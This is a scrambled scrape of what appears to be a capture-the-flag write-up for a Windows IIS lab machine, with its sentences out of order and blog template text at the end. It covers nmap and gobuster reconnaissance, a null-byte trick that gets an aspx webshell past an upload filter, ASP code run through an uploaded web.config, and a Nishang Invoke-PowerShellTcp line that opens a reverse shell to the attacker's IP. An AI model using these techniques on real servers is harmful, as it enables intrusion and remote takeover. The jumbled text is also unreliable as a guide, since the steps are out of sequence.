![]() ![]() Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") Set oScript = Server.CreateObject("WSCRIPT.SHELL") This part seemed most interesting: ' - create the COM objects that we will be using - ' Now, since my asp skills are quite low, I started with the asp webshell that comes on kali ( /usr/share/webshells/asp/cmdasp.asp), and started reading it to determine how code is actually executed. Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 443 ![]() Then add a line at the end to invoke a callback to me: First, grab a copy of Nishang’s Invoke-PowerShellTcp.ps1. ![]() So I’ll opt to go directly to reverse shell. It’s certainly possible to get a webshell, but I’ll notice that the UploadedFiles path is being cleared out every few minutes. On visiting, it returns 3, which means the code executed: I started with a template from the post above, and uploaded it to the site. It would be really interesting if I could modify it via upload.īut even more interestingly, according to this post, I can potentially include asp code in the web.config and get it to run. The web.config file has settings and configuration data for web applications on IIS servers. web.config RCEĪt this point, it’s hard to say what is causing the aspx webshell not to execute, but the error does provide a suggestion to modify the web.config file. This is an improvement, as I know we’ve passed the upload check. Still, when I then view, it returns an error: I can bypass the filter by adding a null byte after our aspx so that the app thinks it’s a jpg, but then saves it as an aspx: On first attempt to upload, the page rejects it: I’ll grab a copy of the aspx shell that comes with kali, and try to upload it. transfer.aspx presents a simple form with “Browse…” and “Upload” buttons:Īfter giving it a simple png file (in my example, a screen capture of the merlin image), the site reports success, and the image can be seen at : Transfer.aspx / UploadedFiles General Functionality Wordlist : /usr/share/wordlists/dirbuster/ The response headers indicate that the site is powered by gobuster -u -w usr/share/wordlists/dirbuster/ -t 30 -o gobuster_root -x aspx The site itself just gives an image of a wizard, merlin.jpg: Nmap done: 1 IP address (1 host up) scanned in 10.92 seconds Service Info: OS: Windows CPE: cpe:/o:microsoft:windows Nmap done: 1 IP address (1 host up) scanned in 26.76 nmap -p 80 -sC -sV -oA nmap/initial 10.10.10.93 Nmap only shows port 80, running IIS nmap -p-min-rate 5000 -oA nmap/alltcp 10.10.10.93
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |